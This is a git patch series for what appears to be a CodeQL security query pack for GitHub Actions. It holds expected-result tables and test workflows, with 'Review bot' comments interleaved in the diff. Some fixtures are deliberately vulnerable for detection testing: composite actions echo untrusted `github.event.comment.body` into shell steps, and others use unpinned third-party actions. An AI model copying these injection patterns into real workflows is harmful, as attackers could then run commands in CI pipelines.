.github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... 
tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... 
ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... 
tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... 
ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... 
tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... 
ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. |
+| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. |
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref
new file mode 100644
index 000000000000..edaea6fbb219
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-094/ExpressionInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml
new file mode 100644
index 000000000000..8bfa15b405c5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/action1/action.yml
@@ -0,0 +1,14 @@
+name: 'test'
+description: 'test'
+branding:
+ icon: 'test'
+ color: 'test'
+inputs:
+ test:
+ description: test
+ required: false
+ default: 'test'
+runs:
+ using: "composite"
+ steps:
+ - run: echo '${{ github.event.comment.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/action2/action.yml
new file mode 100644
index 000000000000..20f8d227348d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/action2/action.yml
@@ -0,0 +1,17 @@
+name: 'Hello World'
+description: 'Greet someone and record the time'
+inputs:
+ who-to-greet: # id of input
+ description: 'Who to greet'
+ required: true
+ default: 'World'
+outputs:
+ time: # id of output
+ description: 'The time we greeted you'
+runs:
+ using: 'docker'
+ steps: # this is actually invalid, used to test we correctly identify composite actions
+ - run: echo '${{ github.event.comment.body }}'
+ image: 'Dockerfile'
+ args:
+ - ${{ inputs.who-to-greet }}
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml
new file mode 100644
index 000000000000..f000ad6a287a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml
@@ -0,0 +1,10 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml
new file mode 100644
index 000000000000..b34dfeec641c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml
@@ -0,0 +1,13 @@
+on:
+ pull_request
+
+permissions: {}
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
+
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
new file mode 100644
index 000000000000..174f9d49e875
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
@@ -0,0 +1 @@
+| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions |
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
new file mode 100644
index 000000000000..ad1c6a996609
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
@@ -0,0 +1,2 @@
+Security/CWE-275/MissingActionsPermissions.ql
+
diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
similarity index 100%
rename from ql/src/test/.github/workflows/actor_trusted_checkout.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml
similarity index 100%
rename from ql/src/test/.github/workflows/label_trusted_checkout.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
new file mode 100644
index 000000000000..992686fb5aa8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
@@ -0,0 +1,11 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: foo/bar
+ - uses: foo/bar@v1
+ - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb
diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
similarity index 100%
rename from ql/src/test/.github/workflows/untrusted_checkout.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
new file mode 100644
index 000000000000..169d9c9ac2b1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
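Review bot: The first step of the unpinned_tags.yml fixture, `- uses: foo/bar`, carries no `@ref` at all, and the UnpinnedActionsTag.expected file added in the following hunk reports only the `foo/bar@v1` step, so a ref-less `uses:` is currently treated as neither pinned nor unpinned. If that is deliberate (as far as I know GitHub does not accept a remote action reference without a ref, so the case may be out of scope), a comment on the step would save the next reader from reading it as a missed finding, e.g. `- uses: foo/bar # no ref: not a valid remote reference, expected to be ignored by the query`. If the query is instead meant to flag it, the expected file needs a matching row.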
@@ -0,0 +1,7 @@ +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... 
n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 |
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
new file mode 100644
index 000000000000..8c9db66bf6bb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UnpinnedActionsTag.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
new file mode 100644
index 000000000000..76d47eec1912
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
@@ -0,0 +1 @@
+| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref
new file mode 100644
index 000000000000..b0c41e712e50
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckout.ql
From 0eabdd9507685da01ff505fb88fc338cba4a8761 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 1 Mar 2024 09:44:33 +0100
Subject: [PATCH 081/707] Rename classes
---
 ql/lib/codeql/actions/Ast.qll | 261 +++++++++---------
 .../actions/controlflow/BasicBlocks.qll | 1 -
 .../actions/controlflow/internal/Cfg.qll | 101 +++----
 .../codeql/actions/dataflow/ExternalFlow.qll | 6 +-
 .../codeql/actions/dataflow/FlowSources.qll | 6 +-
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +-
 .../dataflow/internal/DataFlowPrivate.qll | 59 ++--
 .../dataflow/internal/DataFlowPublic.qll | 12 +-
 ql/src/Debug/partial.ql | 2 +-
 .../Security/CWE-020/CompositeActionsSinks.ql | 4 +-
 .../CWE-020/CompositeActionsSources.ql | 4 +-
 .../CWE-020/CompositeActionsSummaries.ql | 4 +-
 .../CWE-020/ReusableWorkflowsSinks.ql | 4 +-
 .../CWE-020/ReusableWorkflowsSources.ql | 4 +-
 .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +-
 .../CWE-094/CriticalExpressionInjection.ql | 5 +-
 .../Security/CWE-094/ExpressionInjection.ql | 2 +-
 .../CWE-275/MissingActionsPermissions.ql | 8 +-
 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 4 +-
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 +-
 ql/test/library-tests/test.expected | 61 +---
 ql/test/library-tests/test.ql | 44 ++-
 22 files changed, 285 insertions(+), 333 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 2bbf5c8ac0d7..881daf133367 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions
 private import codeql.Locations
 /**
- * Base class for the AST tree. Based on YamlNode from the Yaml library.
+ * Base class for thejAST tree. Based on YamlNode from the Yaml library.
 */
 class AstNode instanceof YamlNode {
 AstNode getParentNode() { result = super.getParentNode() }
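Review bot: The only line this hunk changes on the new side introduces a typo into the `AstNode` doc comment, `* Base class for thejAST tree.`, where the removed line was correct; it should read `* Base class for the AST tree. Based on YamlNode from the Yaml library.` as before. In a commit titled "Rename classes" this looks like an accidental keystroke rather than an intended edit, so the hunk can simply be dropped. The `AstNode` class body continues in the next hunk.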
@@ -14,20 +14,16 @@ class AstNode instanceof YamlNode { string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } Location getLocation() { result = super.getLocation() } -} -/** - * A statement is a group of expressions and/or statements that you design to carry out a task or an action. - * Any statement that can return a value is automatically qualified to be used as an expression. - */ -class Statement extends AstNode { - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } /** - * Gets a environment variable expression by name in the scope of the current step. + * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { + EnvExpr getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | 
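Review bot: The new QLDoc for `getEnclosingWorkflow` still says `Gets the enclosing workflow statement.` although this commit removes the `Statement` class, and the retained `Gets a environment variable expression` line has a grammar slip; suggest `* Gets the enclosing workflow.` and `* Gets an environment variable expression by name in the scope of the current node.`. Both predicates now live directly on `AstNode`, so these comments are the only place in the hunk that still carries the old terminology. The body of `getEnvExpr` continues outside the hunk.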
@@ -40,37 +36,32 @@ class Statement extends AstNode { } } -/** - * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. - */ -class Expression extends Statement { } - /** * A composite action */ -class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { - RunsStmt getRunsStmt() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof Actions::CompositeAction { + Runs getRuns() { result = super.getRuns() } - InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } } -class RunsStmt extends Statement instanceof Actions::Runs { - StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } +class Runs extends AstNode instanceof Actions::Runs { + Step getAStep() { result = super.getSteps().getElementNode(_) } - StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } + Step getStep(int i) { result = super.getSteps().getElementNode(i) } } /** * A Github Actions Workflow */ -class WorkflowStmt extends Statement instanceof Actions::Workflow { +class Workflow extends AstNode instanceof Actions::Workflow { string getName() { result = super.getName() } - JobStmt getAJobStmt() { result = super.getJob(_) } + Job getAJob() { result = super.getJob(_) } - JobStmt getJobStmt(string id) { result = super.getJob(id) } + Job getJob(string id) { result = super.getJob(id) } predicate hasTriggerEvent(string trigger) { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) 
